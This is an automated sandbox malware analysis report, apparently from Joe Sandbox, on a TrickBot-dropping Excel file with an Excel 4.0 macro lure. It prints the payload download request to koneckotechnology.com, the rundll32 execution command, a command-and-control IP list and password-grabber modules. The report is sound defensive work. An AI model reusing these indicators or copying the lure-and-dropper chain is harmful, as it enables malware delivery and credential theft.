Loading ...

Play interactive tourEdit tour

Analysis Report c527325d_by_Libranalysis

Overview

General Information

Sample Name:c527325d_by_Libranalysis (renamed file extension from none to xls)
Analysis ID:412517
MD5:c527325d4d0b51734637b5344a3df760
SHA1:f71b0baa85537ec1709701f39e8e9fd95f9b3d62
SHA256:468cd4b5d89425cd29bb028696804ed339eb2c0c37b010b62442fbb5a8f778ba
Tags:SilentBuilder
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0 TrickBot
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Yara detected Trickbot
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Found Excel 4.0 Macro with suspicious formulas
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Document contains embedded VBA macros
Downloads executable code via HTTP
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1288 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2340 cmdline: rundll32 ..\hsdksksk.iem,StartW MD5: DD81D91FF3B0763C392422865C9AC12E)
      • rundll32.exe (PID: 2312 cmdline: rundll32 ..\hsdksksk.iem,StartW MD5: 51138BEEA3E2C21EC44D0932C71762A8)
        • wermgr.exe (PID: 260 cmdline: C:\Windows\system32\wermgr.exe MD5: 41DF7355A5A907E2C1D7804EC028965D)
  • cleanup

Malware Configuration

Threatname: Trickbot

{"ver": "2000029", "gtag": "net15", "servs": ["103.66.72.217:443", "117.252.68.211:443", "103.124.173.35:443", "115.73.211.230:443", "117.54.250.246:443", "131.0.112.122:443", "69.109.35.254:20445", "43.17.158.63:36366", "130.180.24.227:44321", "131.168.228.35:19932", "185.31.222.247:49372", "151.187.13.249:46881", "190.186.36.209:40737", "42.139.161.213:11056", "23.95.165.4:64265", "189.169.15.32:42761", "125.6.227.80:58405", "217.159.190.123:8412", "47.106.66.231:10710", "46.136.156.92:5385"], "autorun": ["pwgrabb", "pwgrabc"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
c527325d_by_Libranalysis.xlsSUSP_EnableContent_String_GenDetects suspicious string that asks to enable active content in Office DocFlorian Roth
  • 0x1675d:$e1: Enable Editing
  • 0x16495:$e3: Enable editing
  • 0x16572:$e4: Enable content

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.2096107632.0000000000310000.00000040.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
    00000004.00000002.2096083539.0000000000291000.00000020.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
      00000004.00000002.2096003608.00000000001C0000.00000040.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
        00000004.00000002.2096037791.0000000000224000.00000004.00000001.sdmpJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          4.2.rundll32.exe.1c052e.0.raw.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
            4.2.rundll32.exe.290000.2.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security
              4.2.rundll32.exe.1c052e.0.unpackJoeSecurity_TrickBot_4Yara detected TrickbotJoe Security

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
                Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\hsdksksk.iem,StartW, CommandLine: rundll32 ..\hsdksksk.iem,StartW, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1288, ProcessCommandLine: rundll32 ..\hsdksksk.iem,StartW, ProcessId: 2340

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: 00000004.00000002.2096107632.0000000000310000.00000040.00000001.sdmpMalware Configuration Extractor: Trickbot {"ver": "2000029", "gtag": "net15", "servs": ["103.66.72.217:443", "117.252.68.211:443", "103.124.173.35:443", "115.73.211.230:443", "117.54.250.246:443", "131.0.112.122:443", "69.109.35.254:20445", "43.17.158.63:36366", "130.180.24.227:44321", "131.168.228.35:19932", "185.31.222.247:49372", "151.187.13.249:46881", "190.186.36.209:40737", "42.139.161.213:11056", "23.95.165.4:64265", "189.169.15.32:42761", "125.6.227.80:58405", "217.159.190.123:8412", "47.106.66.231:10710", "46.136.156.92:5385"], "autorun": ["pwgrabb", "pwgrabc"], "ecc_key": "RUNTMzAAAAAL/ZqmMPBLaRfg1hPOtFJrZz2Zi2/EC4B3fiX8VnaOUVKndBr+jEqWc7mw4v3ADTiwp64K5QKe1LZ27jUZxL4bWjxARPo85hv72nuedeZhRQ+adQQ/gIsV869MycRzghc="}
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: k:\MSSniffer\Release\Sniffer.pdb\A source: hsdksksk.iem.0.dr
                Source: Binary string: k:\MSSniffer\Release\Sniffer.pdb source: hsdksksk.iem.0.dr

                Software Vulnerabilities:

                barindex
                Document exploit detected (creates forbidden files)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dllJump to behavior
                Document exploit detected (drops PE files)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: netmons[1].dll.0.drJump to dropped file
                Document exploit detected (UrlDownloadToFile)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
                Document exploit detected (process start blacklist hit)Show sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
                Source: global trafficDNS query: name: koneckotechnology.com
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.54.114.131:80
                Source: global trafficTCP traffic: 192.168.2.22:49167 -> 198.54.114.131:80
                Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKdate: Wed, 12 May 2021 16:42:55 GMTserver: Apachelast-modified: Wed, 12 May 2021 13:22:52 GMTaccept-ranges: bytescontent-length: 643072content-type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 67 5d 9f e5 23 3c f1 b6 23 3c f1 b6 23 3c f1 b6 a0 34 ae b6 29 3c f1 b6 d9 1f e8 b6 25 3c f1 b6 30 34 ac b6 21 3c f1 b6 26 30 fe b6 38 3c f1 b6 26 30 ae b6 a9 3c f1 b6 23 3c f0 b6 62 3e f1 b6 a0 34 ac b6 30 3c f1 b6 26 30 91 b6 57 3c f1 b6 26 30 ad b6 22 3c f1 b6 cf 37 af b6 22 3c f1 b6 26 30 ab b6 22 3c f1 b6 52 69 63 68 23 3c f1 b6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 c1 ab 9b 60 00 00 00 00 00 00 00 00 e0 00 0e 21 0b 01 07 0a 00 80 02 00 00 40 07 00 00 00 00 00 9a f2 00 00 00 10 00 00 00 90 02 00 00 00 00 10 00 10 00 00 00 10 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 0a 00 00 10 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 3e 03 00 45 00 00 00 5c 21 03 00 04 01 00 00 00 a0 03 00 7c cf 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 09 00 80 34 00 00 a0 95 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 e6 02 00 48 00 00 00 00 00 00 00 00 00 00 00 00 90 02 00 94 05 00 00 d4 20 03 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 9e 78 02 00 00 10 00 00 00 80 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 55 ae 00 00 00 90 02 00 00 b0 00 00 00 90 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 a4 59 00 00 00 40 03 00 00 30 00 00 00 40 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 7c cf 05 00 00 a0 03 00 00 d0 05 00 00 70 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 04 81 00 00 00 70 09 00 00 90 00 00 00 40 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                Source: Joe Sandbox ViewIP Address: 198.54.114.131 198.54.114.131
                Source: global trafficHTTP traffic detected: GET /netmons.dll HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: koneckotechnology.comConnection: Keep-Alive
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A6DEB57B.emfJump to behavior
                Source: global trafficHTTP traffic detected: GET /netmons.dll HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: koneckotechnology.comConnection: Keep-Alive
                Source: rundll32.exe, 00000003.00000002.2096862600.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
                Source: unknownDNS traffic detected: queries for: koneckotechnology.com
                Source: rundll32.exe, 00000003.00000002.2096862600.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
                Source: rundll32.exe, 00000003.00000002.2096862600.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
                Source: rundll32.exe, 00000003.00000002.2097100289.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096364514.00000000009F7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
                Source: rundll32.exe, 00000003.00000002.2097100289.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096364514.00000000009F7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
                Source: rundll32.exe, 00000003.00000002.2097100289.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096364514.00000000009F7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
                Source: rundll32.exe, 00000003.00000002.2097100289.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096364514.00000000009F7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
                Source: rundll32.exe, 00000003.00000002.2096862600.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
                Source: rundll32.exe, 00000003.00000002.2097100289.0000000001D57000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096364514.00000000009F7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
                Source: rundll32.exe, 00000003.00000002.2096862600.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
                Source: rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

                System Summary:

                barindex
                Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
                Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 4Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 8Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 8Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 12Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 12Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 16Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 16Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 20Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 20Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 24Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 24Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 28Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 28Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 32Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 32Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 36Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 36Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 40Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 40Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 44Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 44Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 48Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 48Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 52Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 52Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 56Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 56Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 60Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 60Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 64Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 64Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 68Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 68Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 72Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 72Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 76Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 76Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 80Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 80Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 84Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 84Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 88Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 88Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 92Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 92Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 96Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 96Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 100Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 100Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 104Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 104Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 108Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 108Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 112Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 112Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 116Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 116Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 120Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 120Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 124Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 124Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 128Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 128Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 132Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 132Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 136Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 136Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Source: Screenshot number: 140Screenshot OCR: Enable editing" to unlock the editing document downloaded from the Internet. 13 ProtectedView Tht
                Source: Screenshot number: 140Screenshot OCR: Enable Content 21 22 23 24 25 :: "" M"crosoft U McAfee a OffiCC 28 29 30 31 32 33 34 3
                Found Excel 4.0 Macro with suspicious formulasShow sources
                Source: c527325d_by_Libranalysis.xlsInitial sample: EXEC
                Office process drops PE fileShow sources
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\hsdksksk.iemJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dllJump to dropped file
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
                Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
                Source: c527325d_by_Libranalysis.xlsOLE indicator, VBA macros: true
                Source: c527325d_by_Libranalysis.xls, type: SAMPLEMatched rule: SUSP_EnableContent_String_Gen date = 2019-02-12, hash1 = 525ba2c8d35f6972ac8fcec8081ae35f6fe8119500be20a4113900fe57d6a0de, author = Florian Roth, description = Detects suspicious string that asks to enable active content in Office Doc, reference = Internal Research
                Source: rundll32.exe, 00000003.00000002.2096862600.0000000001B70000.00000002.00000001.sdmp, rundll32.exe, 00000004.00000002.2096183391.0000000000810000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@7/7@1/1
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\GDIPFONTCACHEV1.DATJump to behavior
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCF4F.tmpJump to behavior
                Source: c527325d_by_Libranalysis.xlsOLE indicator, Workbook stream: true
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\rundll32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\hsdksksk.iem,StartW
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\hsdksksk.iem,StartW
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\hsdksksk.iem,StartW
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\hsdksksk.iem,StartW
                Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32 ..\hsdksksk.iem,StartW
                Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\System32\wermgr.exe C:\Windows\system32\wermgr.exe
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: k:\MSSniffer\Release\Sniffer.pdb\A source: hsdksksk.iem.0.dr
                Source: Binary string: k:\MSSniffer\Release\Sniffer.pdb source: hsdksksk.iem.0.dr
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00221030 LoadLibraryW,GetProcAddress,SetLastError,SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,SetLastError,SetLastError,GetProcessHeap,RtlAllocateHeap,SetLastError,
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 4_2_00325950 push dword ptr [edx+14h]; ret
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\hsdksksk.iemJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\netmons[1].dllJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\hsdksksk.iemJump to dropped file
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\hsdksksk.iemJump to dropped file

                Boot Survival:

                barindex
